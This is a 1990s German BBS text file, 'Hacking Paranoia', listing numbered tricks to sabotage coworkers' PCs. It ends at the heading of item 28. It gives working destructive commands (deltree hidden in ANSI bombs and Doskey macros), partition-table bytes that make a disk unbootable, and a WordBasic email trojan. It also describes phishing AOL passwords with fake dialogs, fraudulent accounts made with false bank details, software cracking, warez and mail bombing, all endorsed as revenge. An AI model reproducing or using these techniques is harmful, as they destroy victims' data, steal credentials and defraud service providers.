Vorwort von THE MIGHTY SCI!:

Jo ... hallo erstmal ... ich bin zwar nicht der Rüdiger ... aber macht ja nichts. Gerade haben wir beschlossen, unsere vierwöchige Schaffenspause mit drei neuen Releases zu überbrücken. Aber nicht daß Ihr denkt, wir haben in der Zwischenzeit auf der faulen Haut gelegen. Seit über 3 Wochen bin ich schon dabei mein neues Board zu installieren, tonnenweise und nächtelang Ansis zu pinseln und PPEs auseinanderzunehmen, weil mal wieder ein paar Coder zu blöd sind, ihrem tollen Release ein CFG-File zu spendieren. Natürlich wird das neue Board auch ein paar neue Releases mit sich bringen: Lord Xeen codet grade am Shopping-Door, am UserMeetingDoor (das übrigens für die Western Alliance ziemlich wichtig ist, denn Group-Members sollten sich ja auch regelmäßig mit solchen Leute treffen, die Ihre Releases scheiße finden hehe) und hoffentlich bringt er auch noch den neuen Chatter fertig. Doc Fred arbeitet grade an seinem ersten längerem Roman (nachdem Ihr meine letzten Kurzgeschichte hoffentlich interessant gefunden habt). Sandman bastelt hoffentlich die WWW-Page zuende und Netrider is auch grad drüber, nen neuen Song aufzunehmen. Trotzdem würden wir uns über neue Members freuen. Callt einfach die Shogunat, wechselt in die UE-Konferenz und schreibt mir ne schöne Mail :)

und jetzt viel Spaß mit Bad Peon's


HACKING PARANOIA


Inhalt:
ThemaTip-Nummern
CD-ROM6
Datenspionage31 32 45
E-Mail19 24 30
Excel0
EXE-Dateien4
Internet11 14 19 24
Komprimierer4 21
Makros1 16 24 25 39 41
MS-DOS4 5 6 9 15 16 18
Netzwerk25 29 31 36 44
OLE39
Online2 3 11 14 19 26 27 30
OS/240
Paßwörter15 21 27 28 32 44
Freischaltungen13 14 17 24
Shareware13 33
Start-Parameter0 1 4 10
Trojanity24 25 29 35 39 41
Viren12 24 25 29 35 39 41
Windows0 1 5 6 7 8 10 20 22 23 24 34 37 38 39 42
Windows 3.x5 6 7 8 20 23 24 28 35 43 36
Windows9535 37 38 39 42 43 44 46
Winword1 22 25 35 41




(0) Excel - und nichts geht mehr!
Bewertung: Harmlos

Gestern hat mich Kollege S. mit seiner neunmalklugen Art maßlos geärgert. Im Grunde ist er noch einer der Genießbaren in diesem Laden, aber eine kleine Rache konnte ich mir doch nicht verkneifen: Da ich weiß, daß er vorwiegend mit Excel arbeitet, setzte ich am Abend, als er vor der Tagesschau saß, hinter den Programmaufruf "excel.exe" im Programm-Mangaer zusätzlich den Schalter "/d". Dieser unerfreuliche Parameter fährt Excel zwar wie gewohnt hoch, gibt dem Excel-Fenster jedoch keinen Eingabefocus: Innerhalb des Fensters läuft dann die Sanduhr und verbietet alle Eingaben oder Menüaufrufe.

(1) Winword starten: "Hello" and "Goodbye"
1.
Bewertung: Harmlos

Ein ätzendes Arbeitsumfeld. Man kann sich hier nur abreagiern, indem man seine Umgebung mit drastischem PC-Versagen beglückt. Meist sind meine Eingriffe harmloser Natur und verursachen trotzdem gewaltigen Ärger. Gern ändere ich zum Beispiel die Winword-Programmzeile im Programm-Manager. Statt "winword.exe" trage ich die Zeile "winword.exe /mDateiBeenden" ein. Da Winword jedes beliebiege Makro oder jeden Standartbefehl nach dem Parameter "/m" akzeptiert, läßt sich mit dem Start des Programms auch gleich dessen Beenden anfordern. Das ist zwar Blödsinn, sorgt jedoch für einige Verwirrung und lockert so den Büroalltag auf.

2. Bewertung: Massiv

Viel Spaß bereiten mir auch kleine Manipulationen an den bekannten INI-Dateien. Weil er ebenso simpel wie undurchsichtig ist, favorisiere ich folgenden Trick: Ich hänge an die Zeile "shell=progman.exe" der SYSTEM.INI das unsichtbare ASCII-Zeichen 255 an. Danach verabschiedet sich Windows bereits beim Start und der ratlose Mitmensch erwägt schließlich gar eine Neuinstallation.

(2) Modem-Strafen gegen Wichtigtuer
Bewertung: Harmlos

Ich kann es auf den Tod nicht leiden, wenn mich arrogante Wichtigtuer nicht ernstnehmen. Vor allem in öffentlichen Instutitionen kokettieren am Bürostuhl festgewachsene Ignoranten mit ihrer vielbeschäftigten Wichtigkeit - und gehen partout nicht ans Telefon, wenn ich anrufe. Auch manche Kollegen lassen mich grundsätzlich warten.

Damit sie erfahren, daß ich das nicht abkann, unterbreche ich nach dem 10. Klingelversuch stets meine Voice-Connection und lasse besser mein Modem arbeiten: Dem ist es nach dem Befehl "ats7=255" ganz egal, ob es 100mal klingeln muß. Irgendwann geht "er" oder "sie" dann doch ran und hört mich pfeiffen. Dann lasse ich gleich noch mal das Modem arbeiten - Strafe muß schließlich sein!

(3) Beim Faxen kann es rundgehen!
Bewertung: Massiv

Kollege W. ist ganz wichtig. Ganz wichtige Menschen haben auch zu Hause ein Fax. Ich bin unwichtig, mag ganz Wichtige nicht, habe aber auch ein Fax zu Hause - ein Fax gegen ganz Wichtige: Ich klebe drei freundlich bedruckte DIN-A4-Blätter mit Tesa zusammen und lege sie ins Faxgerät. Ist der Fax-Job soweit durchgelaufen, bis sich das vordere Ende mit dem hinteren zu einem Kreis schließen läßt, verklebe ich diesen ebenfalls mit Tesa. Bevor ich nun für ein paar Stunden in die Kneipe gehe, prüfe ich, ob sich mein Endlos-Fax auch wirklich störungsfrei dreht...

Immer drandenken: Das Papier des Kollegen W. ist teurer als meine Telefoneinheiten!

(4) Viel Farbenpracht mit ANSI-Bomben
Bewertung: Harmlos bis vernichtend

Mit ANSI-Bomben kann man tolle Sachen machen... z.B. Tasten umbelegen:
[13;8;13;13p
In diesem Fall erhält die [Return]-Taste (ASCII 13) einen eingebauten Rückschritt (ASCII 8) verpaßt, was sie normale Eingabe fantasievoller gestaltet. Extrem gefährliche Belegung:
"/";13;"echo deltree /y c:\*.* >> c:\autoexec.bat";13;"cls";13;13p
hängt ein "deltree /y c:\*.*" und ein "cls" an die autoexec.bat an, sobald die "/"-Taste einmal gedrückt wird. Nach dem nächsten Booten dürfte der glückliche User mehr Platz auf seiner Platte frei haben!

Solche Bomben kann man gut über selbstentpackende Archive anderen Leuten unterschieben; dummerweise schaltet PKZIP ANSI-Kommentare ja standartmäßig ab, doch es gibt ja noch ARJ... ich lege also mit "arj a arch dateien" das Archiv an, füge mit "arj c arch -zKommenterdatei" den Kommentar (die ANSI-Bombe) hinzu und mache das Archiv mit "arj y -je1 -ja arch" zum Selbstentpacker. Zur besseren Tarnung schmücken ich seine ANSI-Sequenzen mit einigen farbenfrohen Bildern und Texten.

Diese Belegungen halten natürlich nur solange, bis der Rechner neu gebootet wird oder die DOS-Box beendet wird, also keine allzu latentente Belegungen! Außerdem: Ohne ANSI.SYS geht (logisch) gar nichts. Übrigens existieren auch komfortable ANSI-Bomben-Generatoren, wie z.B. ANSIB20.EXE, mit denen man äussert einfach und effektiv ANSI-Bomben erstellen kann. Solche Programme sollte man keinen Loosern geben!

(5) WIN.COM und SETVER.EXE: Umgekehrt eingesetzt
Bewertung: Massiv

SETVER dient ja bekanntlich dazu, nicht laufenden Programmen eine andere DOS- Version vorzugaukeln, damit sie funktionieren. Aber umgekehrt klappt's noch besser: Mal kurz "setver win.com 3.00" eingetippt, und schon wird Windows 3.1x nie mehr funktionieren - sogar eine Neuinstallation bringt nichts (einzig und allein "setver win.com /d").

(6) Wer ein CD-ROM hat, hat mehr vom Leben. Oder auch weniger!
Bewertung: Harmlos

Wer weiß, daß DOS den Namen des CD-ROMs (wird von MSCDEX abgefragt) wie einen reservierten Gerätenamen (wie LPT1) betrachtet, kann natürlich in CONFIG.SYS und AUTOEXEC.BAT einen anderen, populäreren Namen als "MSCD001" einstellen, z.B. WIN, und schon kann man auf kein Verzeichnis namens WIN und auf keine Datei WIN.* mehr zugreifen!

(7) Windows: Farben verbogen
Bewertung: Harmlos

Zugegeben nicht sehr tiefgreifend, aber ganz nett kommt es, wenn man unter Windows die Farben der Bildschirmelemente "Menütext", "Menüleiste", "Deaktivierter Text", "Hervorhebung" und "Aktiver Text" alle auf weiß setzt. Mangels Kontrast dürfte die Lesbarkeit deutlich leiden... und wer nicht weiß, in welcher INI-Datei die Farben stehen, dürfte Probleme haben, ohne Neuinstallation jemals wieder vernünftig arbeiten zu können.

(8) Windows ohne Programme
Bewertung: Massiv

DAS hätte ich nicht mal Microsoft zugetraut: Die typischen Extensionen für ausführbare Programme in Windows sind nicht fest verdrahtet, sondern stehen im Klartext in der WIN.INI in der Zeile "Programs="! Wer hier mal schnell etwas aufräumt ("Wer braucht schon EXE-Dateien?!") kann einiges an Verwirrung stiften!

(9) DOS- und Windows-Bug verhindert Booten
Bewertung: Absolut mega-ultra tödlich, garantiert vernichtend fatal und letal!

Ein besonders unglückliches Gesicht machen PC-Besitzer, die beim Booten die Meldung "Bitte Systemdiskette einlegen" lesen müssen. Noch verzweifelter werden sie, wenn sogar diese Meldung ausbleibt. Stundenlanges suchen nach einem Fehler im CMOS wäre die Folge - ohne Erfolg. Dank eines Bugs in MS-DOS Version 5.0 und höher kann ich jede Festplatte mittels eines simplen Diskeditors rigoros killen und fast völlig unbrauchbar machen:

Ich suche mir also in der Partitionstabelle die Eintragungen für die aktive Partition (leicht an der führenden "80" (hex) ab Offset 1DE von Zylinder 0, Sektor 0 zu erkennen) und ersetzt ihn durch diese Byte-Folge:
0000 0100 0500 B80B 0100 0000 BC01 0000
Wird das System nun neu gestartet, interpretiert DOS den Eintrag als eine nicht aktive, erweiterte Partition, beginnend bei Kopf 0, Zylinder 0, Sektor 1 und endend bei Kopf 0, Zylinder 523, Sektor 56. Da der Beginn dieser Partiton identisch mit dem Master-Boot-Sektor (Kopf 0, Zylinder 0, Sektor 1) ist, rotiert DOS bei der Suche nach aktiven Partitionen im Kreis ("rekursive Partition"). In der Folge bleibt das System im Bootvorgang stehen. Das Booten von Diskette hilft auch nicht weiter, denn auch hier versucht das Betriebssystem, die Festplatte zu initialisieren, und verfängt sich ebenfalls im Teufelskreis.

Dies ist die schlimmste nicht-physikalische Beschädigung einer Festplatte, die mir bekannt ist. Die einzige Rettung ist eine Bootdiskette mit MS-DOS 3.3 oder DR-DOS drauf; dann kann man die Platte wenigstens neu partitionieren. Die Daten, die vorher drauf waren, sind spätestens dann garantiert futsch.

(10) PIF - Perverted Information File
Bewertung: Massiv

Nichts ist besser als eine verbogene PIF-Datei dazu geeignet, einem Windows- Fuzzi zu zeigen, daß er von DOS besser die Finger lassen sollte. Ich suche mir seine Verknüpfung mit Command und hänge an die Befehlszeile "command.com" noch ein "/p" dran. Damit ist der Rückweg über "exit" gesperrt. Wenn ich jetzt noch alle "Zugriffstasten auf Windows" für DOS reserviere, gibt es keinen Ausweg mehr aus der DOS-Box (außer einem Warmstart). Dieser User wird nie mehr eine DOS-Box starten!

(11) Kostenlos ins Internet
Bewertung: Spart Geld

Meine ersten Ausflüge ins Internet waren ergiebig, aber teuer: Ich schüttete eine Dose Cola über die Tastatur, als ich die erste Rechnung las. So konnte es nicht weitergehen! Ich beschloß, in Zukunft kostenlos zu surfen. Mit den von (fast) allen Online-Anbietern offerierten Probe-Accounts kann man sich jeweils zwischen 10 und 70 Stunden gebührenfrei im Internet herumtreiben.

Ich sammle alle Disketten und CDs, die AOL verschenkt: Auf jeder dieser Disketten steht der Zugangscode mit dem -passwort, mit deren Hilfe man sich als neuer User anmelden kann. Wenn ich einigermaßen sinnvolle persönliche Daten angebe, habe ich schon wieder 10 Stunden "kostenlos" (Telekom suckx!) zur Verfügung. Es gibt sogar AOL-Account-Hackerprogramme, die auf Mausklick einen gülitgen Zugang erzeugen und einen gleich bei AOL anmelden. Einfacher und schneller geht's nicht. Leider gibt's gelegentlich Probleme mit den deutschen Versionen der Zugangssoftware, aber auch dafür gibt's inzwischen Patches.

Quantitativ noch besser aber dünner gesät und vor allem langsamer sind die CompuServe-Probe-Accounts mit 70 Freistunden.

Anmerkung von Mighty SCI:

einfach besser ist es natürlich, falsche Kontonummern und Adressen bei AOL anzugeben, wenn man Glück hat, kann man einen ganzen Monat lang umsonst surfen. Allerdings sollte man vorher den Netscape Navigator installieren, sonst sieht man auf Seiten mit Frames GAR NICHTS und außerdem schmeißen einen die ganzen Warez-Groups mit "AOL SUCKS"-Detektor gleich wieder raus!

(12) Frankenstein in Aktion: Viren Marke Eigenbau
Bewertung: Vernichtend

Fremde Viren zu horten und auszusetzen macht nur kurze zeit Spaß. Besser sind da die einschlägigen Virus-Construction-Kits wie z.B. das "Instant Virus Production Kit" (IVP) oder das "Virus Construction Lab" (VCL), wobei VCL besser und komfortabler ist, da man für IVP noch einen ASM-Compiler braucht. In VCL ist zwar eine Paßwortabfrage eingebaut, aber wer William Gibsons "Neuromancer" gelesen hat, dürfte auf die Lösung gekommen sein: "Chiba City". VCL kennt viele Schadenseffekte von "Beep the PC speaker" über "Display an ANSI" bis hin zu "Trash some Disks", auch in Kombinationen und nur unter bestimmten Bedingungen (z.B. Datum). Allerdings erkennen viele Virenscanner die Viren, die VCL erzeugt.

(13) Shareware: Zahlen sollen andere
Bewertung: Ganz verboten!!!

1.

Mich nerven die ewigen Registrieraufforderungen von Sharewareprogrammen, die hier ein [Return] und dort ein verlangen oder mir einfach mit dummen Warteroutinen die Zeit stehlen! Man kann natürlich unter 4DOS mit dem Keystack- Befehl oder unter Windows mit dem SendKeys-Programmierkommando Tastenanschläge übergeben: So kann man Meldungen beim Programmstart unterdrücken.

Mit Hilfe eines Windows-Resource-Kits, das in allen gängigen Compilern enthalten ist, kann man die Zahlungsaufforderungen aber auch gleich ganz aus dem Code entfernen. So läßt sich etwa mit Borlands Resource Workshop (enthalten in den Programmiersprachen Borland Pascal und Boland C++) fast jedes Windows-Programm auseinandernehmen. Meist sind die "Nag-Screens" (Nerv-Meldungen) schnell gefunden - nichts wie weg damit: einfach die Ressourcen-Nummer löschen.

Sollte es mal nicht klappen, liegt's meistens daran, daß das Programm mit Visual Basic geschrieben ist. Kein Problem: Decompilier dafür sind überall erhältlich. Dann noch schnell die Nag-Screens deaktivieren und das Programm auf den eigenen Namen registrieren - fertig. 2.

Freischaltschlüssel für viele Programme gibt es in Mailboxen und v.a. im Internet. Einfach die Suchdienste bemühen, die meisten Seiten enthalten viele Links und so hat man schnell eine ansehliche Addressensammlung für Cracks und Hacks in seiner Bookmark-Liste. Ausprobieren sollte man mal: http://www.aloha.com/~merlin/DrDoS/appslist.htm 3.

Noch schöner sind natürlich Crack-Sammlung wie z.B. der Nag-Buster, zu finden in den hinteren Ecken des Internets. 4.

...und Mighty SCI meint da noch: SoftICE rulez! :)

(14) Internet-Seriennummern für die Installation
Bewertung: Ganz verboten!!!

Bei der Installation neuerer Programme fragt das Setup öfters mal nach einer Seriennummer. Zu meinem Erstaunen funktioniert hier ziemlich oft simpler Zahlensalat - einfach mal aufm numerischen Ziffernblock austoben! Wenn's nicht geht, muß ich halt eine Liste mit Tausenden von Seriennummern drauf bemühen, zu finden z.B. unter:

http://icecube.acf-lab.alaska.edu/~fstbo/warez/serial.html

(15) Lächerliches Dosshell-Paßwort
Bewertung: Harmlos

Die Dosshell, dieses Mini-Windows, das bei MS-DOS 5.0 dabei ist, war von Anfang an eine Totgeburt. Ein paar Idioten gibt es aber doch, die sich dafür begeistern und ausgiebig von der Funktion gebrauch machen, Programme mit einem Paßwort zu versehen. Lächerlich: Erstens kann jeder die Shell verlassen und die Programme unbeheligt direkt starten; zweitens steht das Paßwort "verschlüsselt" in der SHELL.INI. Selbst Achtjährige könnten diesen Code knacken! Jeder Buchstabe des Paßworts wird im Alphabet einfach sechs Stellen zurückgestellt. Und - o Wunder - Buchstaben, die dabei herausfallen, werden am Ende wieder eingesetzt!! Ein G wird also zu A, H zu B usw. A-F wird zu U-Z.

Warum sollte man sowas hacken? Ganz einfach: Viele Leute benutzen immer das gleiche Paßwort! Und so kommt man dann an Passwörter für Online-Dienste, Netzzugänge etc.

(16) Immer Ärger mit Doskey-Makros
Bewertung: Vernichtend

Meine Alleinherrschaft am DOS-Prompt scheint längst gebrochen. Immer mehr Kollegen glauben, ein Blick ins Handbuch oder in die kümmerliche Online- Hilfe würde sie lehren, was in DOS steckt. Um sie wieder auf den Boden der Realität herunterzuholen, setzte ich meinen alten Freund Doskey ein. Dazu muß ihm zuerst einmal lahmlegen, dann auch sein Leistungsumfang ist gut dokumentiert. Doskey weigert sich allerdings recht beharrlich, spurlos von der Bildfläche zu verschwinden. Befehle wie "doskey doskey=echo." geben den gesamten Befehl hinter dem "=" am Bildschirm aus und verraten so die bösen Pläne.

Abhilfe schafft das ASCII-Zeichen 255. Zuerst erstselle ich eine Batchdatei mit diesem unsichtbaren Zeichen als Namen und mit folgendem Inhalt:


@echo off
doskey win=win$techo j.|del c:\win\*.*
doskey doskey=

Die Batch bewirkt, daß Doskey nach außen hin einwandfrei funktioniert. Zwischen der ersten und der letzten Zeile kann ich beliebige Doskey-Bosheiten treiben. Die letzte Zeile, die wieder mit dem unsichtbaren Zeichen endet, deaktiviert den Doskey-Aufruf selbst, der fürderhin nur noch diese Batch aufruft und keine Makros mehr definiert.

Besonders schick finde ich diese unsichtbare Batchdatei mit einem VerstecktAttribut, und der angestammte Aufruf für eine ASCII-255-Batch ist natürlich eine (unsichtbare!) Zeile in der AUTOEXEC.BAT. Halbgelehrte DOS-User sind mit solchen harmlosen Eingriffen schenll wieder auf den Boden der Realität zurückgeholt (Besonders, wenn ihnen nach dem nächsten Windows-Start und -Ende (oder dem Start ein DOS-Box) das Windows-Verzeichnis ausgeleert wird!).

(17) Demoprogramme: Keine lästigen Datumsabfragen
Bewertung: Spart Geld

Manches Demoprogramm erdreistet sich, nur eine gewisse Probezeit zu laufen. Danach erscheint die Meldung, daß die Probezeit jetzt vorbei sei und ich doch bitte die Vollversion erwerben möge. Schade, denn eigentlich habe ich die Vollversion des Programms ja schon auf meiner Festplatte, wäre da nicht dieser Zeitcheck. Die Lösung des Problems ist simpel: Einfach das Datum umstellen! Und weil's bei größerern Programmsammlungen schnell unübersictlich wird, gibt es für sowas Datecracker: Sie setzten vor dem Start das Systemdatum zurück und danach wieder vor. Vom Datecracker merkt man nichts, da er ständig im Hintergrund läuft. Ein hilfreiches Utility, daß einem im laufe der Zeit eine Menge Geld spart; zu bekommen im Internet oder in der einschlägigen Mailboxen.

(18) Finaler Schuß mit Verzögerung - die Pipebomb!
Bewertung: Vernichtend

Meine Toleranzgrenze hinsichtlich Kollege W. ist endgültig überschritten, da er mich gestern erneut beim Chef angeschwärzt hat. Heute mittag nutze ich seine Abwesenheit für einen finalen Anschlag: Ich beende sein laufendes Windows und start es neu mit:
win|deltree /y c:\*.* Nach seiner Pause kann er sich meinetwegen stundenlang unter Windows vergnügen. Sobeld er es aber verläßt, schlägt Deltree zu. Was Domestos für die Klo schüssel ist, ist Deltree für den PC. Ich gehe heute lieber schon etwas früher nach Hause. Je weiter ich weg bin, desto weniger kann ich schuld sein...

(19) Anonyme Remailer: 10.000 digitale Fußtritte
Bewertung: Massiv

Anonyme Massen-Mails sind praktisch, wenn man mal unerkannt Dampf ablassen will. Leider weigern sich die gängigen Mail-Programme, Post ohne Absender zu verschicken. Aber Not macht erfinderisch, und inzwischen tummeln sich im Internet Gleichgesinnte, die ihre Dienste als "Anonyme Remailer" anbieten. Also: Die entsprechende WWW-Seite anwählen, Formular ausfüllen, und ab geht die Post - wenn gewünscht sogar in 10.000facher (!) Ausfertigung an den geliebten Empfänger. Die entsprechenden WWW-Seiten sind kein Geheimnis: In den üblichen Suchmaschinen (z.B. http://www.yahoo.com) findet man Links zu den verschieden Remailern.

Aber es geht noch simpler: Mit AMAIL10.ZIP findet man auch für Windows 95 einen Mail-Client, der in der Lage ist, Post ohne Absenderangabe zu befördern.

(20) Durch die Hintertür zur Programmausführung

Bewertung: Schnüffelei

Eine Geschäftsreise führte mich in eine öffentliches Institut. Dort setzte man mich an ein absolut restriktives Windows 3.11-System, das als einzige Anwendung Works erlauben sollte. Es war mir auf Anhieb weder möglich, das als Shell eingestellte Works schon über DOS zu übergehen, noch unter Works "anderes auszuführen".

Doch eine Lücke gibt es immer, zumal Windows mit OLE und dem Objektmanager immer eine Hintertür zur Programmausführung offenhält. In diesem Fall behalf ich mir folgendermaßen: Das Works-Menü enthält wie alle anderen Anwendungen standartmäßig den Befehl "Einfügen, Objekt". Wählt man hier Objekttyp "Paket", öffnet sich der Objektmanager.

Hier gibt es wiederum dem Befehl "Bearbeiten, Befehlszeile", über den sich jedes beliebige Programm, etwa auch der Programm- oder Dateimanagaer starten läßt - somit steht wieder die gesamte Windows-Funktionalität uneingeschränkt bereit! Daß ich bei dieser Gelegenheit Spuren hinterließ, die meinen Durchbruch nachhaltig dokumentierten, versteht sich von selbst...

(21) ZIP-Dateien mit Norton Commander schlechter verschlüsselt
Bewertung: Schnüffelei

Ein Charakterzug eines erfolgreichen Hackers ist Geduld bei ständiger Wachsamkeit. Es kann Wochen, manchmal Monate dauern, bis ein Problem sich zufällig und wie von selbst löst. Ein Kollege von mir pflegte offenbar wichtige Daten als ZIP-Archive ins Netz zu stellen. Die Daten waren mit einem anscheinend langen und komplexen Paßwort so gut geschützt, daß sich meine Brute-Force-ZIP-Knack-Routine auch nach stundenlangen Crack-Versuchen nachhaltig die Zähne ausbiß. Ich hortete also die Dateien und wartete auf bessere Tage...

Die Gelegenheit kam: Unvermutet tauchte der Kollege auf und bat mich um einen Rat wegen einer Excel-Anpassung. Ich hatte eine halbe Stunde Zeit, mich auf seinem Rechner umzusehen, und fand prompt die Datei ZIP.LST in seinem TEMP-Verzeichnis. Die lizensierte PKZIP-Version im Norton Commander legt diese ASCII-Datei an, und sie enthält das Paßwort in unverschlüsselter Form.

Erfreulich, daß die meisten Menschen immer das gleiche Paßwort benutzen: Das so emittelte Paßwort paßte nicht nur für die vorher gesammelten ZIP-Archive, sondern gab mir auch Zugang zum Novell-Account des Kollegen!

Übrigens: Sein Excel-Problem habe ich erfolgreich gelöst. Er mag mich.

(22) Winword 6/7 - automatisch falsch
Bewertung: Harmlos

Microsoft hat den Winword-Anwender mit besonders schönen, automatischen Funktionen beglückt: Fast alle Fehler korrigiert Winword schon bei der Texteingabe - es ist wohl nur noch ein kurzer Weg bis zur vollautomatischen Brief-, Fax- und Romanerstellung auf der Basis von Microsoft-Vorlagen. Kollege W. ist kein besonderer Fan dieser Funktionen, könnte es aber bald werden:

Unter "Extras, Autokorrektur" gebe ich eine Liste mit falsch zu schreibenden Wörtern ein (z.B. "Ersetzen: Beispiel Durch: biespeil"), wobei ich darauf achte, daß die Option "Während der Eingabe ersetzten" aktiviert ist.

Vielleicht fülle ich bei der nächsten Gelegenheit zusätzlich sein Benutzer wörterbuch BENUTZER.DIC mit beliebten Rechschreibfehlern. Damit ist sicher gestellt, daß auch die Rechtschreibprüfung mehr Fehler übersieht als findet.

(23) Beschwippste Mäuse für Rechtshänder
Bewertung: Harmlos

Schön, daß die Entwickler von Windows auch an Linkshänder gedacht haben. Wenn man Windows richtig konfiguriert kann man unsymphatische Rechtshänder zwingen, eingefahrene Denkgewohnheiten aufzugeben. Ich habe in der Windows-Systemsteuerung die Maus meines Kollegen S. auf linkshändig umgestellt. Niemand zwingt ihn nun, den Zeigefinger durch Doppelklicken zu überlasten, während sich der Mittlelfinger ausruhen darf. Um ihn bein dieser Umstellung zu fordern, habe ich die Doppelklickgeschwindigkeit extrem hoch eingestellt. Im Vorbeigehen sehe ich den Streber S. an einer um 180ø gedrehten Maus arbeiten. Es dauert in diesem Laden, bis die EDV-Abteilung eine Antrag auf eine neue Maus stattgibt. Übrigens: Damit er die Maus nicht gleich wieder umstellt, habe ich nach der Änderung die SYSTEM.INI schreibgeschützt. Ein Windows-User scheint mit solchen systemnahen Dingen überfordert zu sein.

(24) Windows 3.1x - ein Reboot tut immer gut
Bewertung: Vernichtend

Da sitzen die Kollegen stundenlang vor dem PC, ohne auch nur ein einziges Mal ihr System neu zu installieren oder wenigstens frisch zu starten. Wer einen Windows-PC derart behandelt, muß sich nicht wundern, daß sich Überreste gebrauchter DLLs und sonstiger Abfall im Speicher sammeln. Die Folge: Das System läuft instabil, und alle fluchen auf Bill Gates. Also: Wer nicht freiwillig während der Arbeit den Computer neu bootet, den zwinge ich persönlich zu einem angemessenem Umgang mit Windows.

Als Handwerkszeug benutze ich Winword, gehe aber selbstverständlich anders vor als die bekannten Makroviren oder ähnlich konstruierte Trojaner. Ich öffne eine neue Dokumentvorlage, in der ich die beiden Makros "AutoOpen" und "Ciao" unterbringe, und schreibe einen netten Text in das Dokumentfenster - zum Beispiel Geburtstaggrüße. Jetzt muß ich die Vorlage als normalen Word-Text tarnen, indem ich die Dateiendung von DOT auf DOC ändere. Der "Text" sieht dann etwa so aus:


Makro AutoOpen:
Sub MAIN
x$=DateiName$() + ":ciao"
MakroKopieren x$, "Global:AutoExec"
End Sub
Makro Ciao:
Declare Function ExitWindows Lib "User32" Alias "ExitWindowsEx"(wReturnCode As Long, dwReserved As Long) As Long
Sub MAIN
text$ = "In der Anwendung PROGMAN.EXE ist der falsche Ausnahmefehler 0815 aufgetreten" + Chr$(13) + " Windows wird beendet"
titel$ = "Fehler!"
MsgBox Text$, Titel$, 48
x = ExitWindows (1, 0)
End Sub

Diesen "Text" schicke ich per E-Mail. Öffnet jemand die Datei mit Winword, kopiert "AutoOpen" das zweite Makro "Shutdown" unter dem Namen "Reboot" in die globale Dokumentvorlage. Über die OnTime-Anweisung rufe ich das Makro genau eine Stunde später ab. Mein Text ist bis dahin längst vergessen. Da ich heute nur den Kollgen W. treffen will, der die Winword-Version 7 benutzt, kann ich mir die Varianten für ältere Programmversionen ersparen.

(25) Beim richtigen Köder beißt jeder an
Bewertung: Spionage

Winword-Köderdateien mit selbstauslösenden Makros sind mein beliebtestes Werkzeug, fremde Rechner zu optimieren. Das technische Prinzip dieser Dokumentviren oder Trojanischen Pferde ist klar und mittlerweile leider beschrieben. Aber entscheidend für den Erfolg oder Mißerfolg eines solchen Köders sind der Dateiname und der Inhalt der Datei - und hier erweisen sich manche Hacker-Kollegen als fantsielos.

Ein Beispiel für eine sehr erfolgversprechende Köderdatei - gut zugänglich im Hausnetz postiert - könnte etwa SEXTIPS.DOC heißen: Man glaubt gar nicht, wie viele Mitmenschen dringend Tips benötigen... Die nächste Überlegung betrifft den Inhalt: Dumm, sich hier nur auf bloßen Text zu beschränken! Dann öffnet ein potentielles Opfer den Text mit einem unsensible DOS-Viewer, und die hübschen Makros wären für die Katz! Nein: Der Hauptinhalt einer erfolgreichen Köderdatei sind eingebettete Bilder, die das Opfer mehr oder weniger zwingen, die gewünschte Anwendung zu starten. Findet ein Benutzer im DOS-Viewer nur einige Zeilen vielverheißenden Bildkommentar, gibt es in der Regel kein Halten mehr: Er startet Winword, um die Bilder zu sehen - und es entspricht meiner Philosophie "Tarnung durch Befriedigung", daß er dann auch wirklich zu sehen bekommt, was er erwartet. Dann denkt er garantiert nicht mehr an Makroviren.

(26) Internet-Surfen wird zur Geduldsprobe

Internet-Surfer haben eine Engelsgeduld. Stundenlang beobachtet mein Kollege mit bösem Blick, wie eine Web-Seite Byte für Byte in seinen PC tröpfelt. Ob auch ihm mal der Geduldsfaden reißt? Ein präpariertes HTML-Dokument soll seine Schmerzgrenze testen. Um sicherzugehen, daß die HTML-Seite beim Start von Netscape geladen wird, trage ich etwa "file://terror.htm" unter "Options, General Preferences, Appearance, Start With" ein und aktiviere den Radiobutton "Home Page Location". terror.htm sieht ungefähr so aus:

[ entspricht < und ] entspricht >


[HTML]
[HEAD]
[TITLE]Java Script[/Title]
[/HEAD]
[BODY ONLOAD=FensterAerger()]
[SCRIPT LANGUAGE="JavaScript"]
function FensterAerger()
{while (true)
windows.alert ("Bitte klicken Sie so oft auf OK, bis sich dieses Fenster schließt.")
}
[/SCRIPT]
[/BODY]
[/HTML]

Die beiden Java-Script-Zeilen öffnen ein Mitteilungsfenster mit dem angegebenen Text. Ein Klick auf den OK-Button bringt nichts, und auch Netscape läßt sich nicht mehr beenden. Bleibt also nur noch der Drei-Finger-Griff [Strg]-[Alt]-[Entf], den man am besten mit einem wilden Fluch begleitet - zumindest mein Kollege tut es das: Und es hilft!

Das ganze funktioniert bei Netscape 2.01 nur dann, wenn Java und Java Script nicht deaktiviert sind.

(27) Compuserve und America Online für Hacker
Bewertung: Spionage

Gehackt wir überall: Hacker gibt es nicht nur im Internet, sondern auch in Compuserve und America Online. Da das Hacken mit guter Software leichter geht, haben Leute feine fiese Software gedrechselt. Mit diesen Programmen kann man Mail-Bomben verschicken, Chat-Räume mit einem Mausklick zum Schweigen bringen, aber auch Paßwörter klauen oder kostenlos ins Internet spazieren.

Compudaze, ein Compuserve-Hackprogramm, beschränkt sich im wesentlichen auf Spielereien mit Compuserve-Chat-Räumen und auf Massen-Mails. Für AOL dagegen gibt es zig Programme, die alle Möglichkeiten der America-Online-Software ausreizen.

Zur Zeit ist es nicht leicht, an AOL-Hack-Software heranzukommen. Warum? AOL nötigt jeden, der AOL-relevante Software im Internet oder somstwo anbietet, das Material zu entfernen. Offensichlich ist AOL nicht in der Lage, Hack-Programme abzublocken. Den meisten Spaß verursachen AOL-Hack-Programme, die es gestatten, bei aktive AOL-Benutzern eine offiziell wirkende Dialogbox auf den Bildschirm zu zaubern.

In die Dialogboxen kann man einen beliebigen Text eingeben. So habe ich AOL-Benutzer mit dem Dialog "AOL-Sicherheitsabfrage" aufgefordert, ihr Paßwort erneut einzutippen.

Fast alle Benutzer haben mir ihr Paßwort verraten. Bequemer kann ich mir das Hacken von Accounts nicht vorstellen. Dies ist ein Trick, der übrigens fast überall funktioniert, wo Paßwörter gebraucht werden, z.B. in einem Novell-Netz.

(28) Paßwort knacken leicht gemacht
Bewertung: Spionage

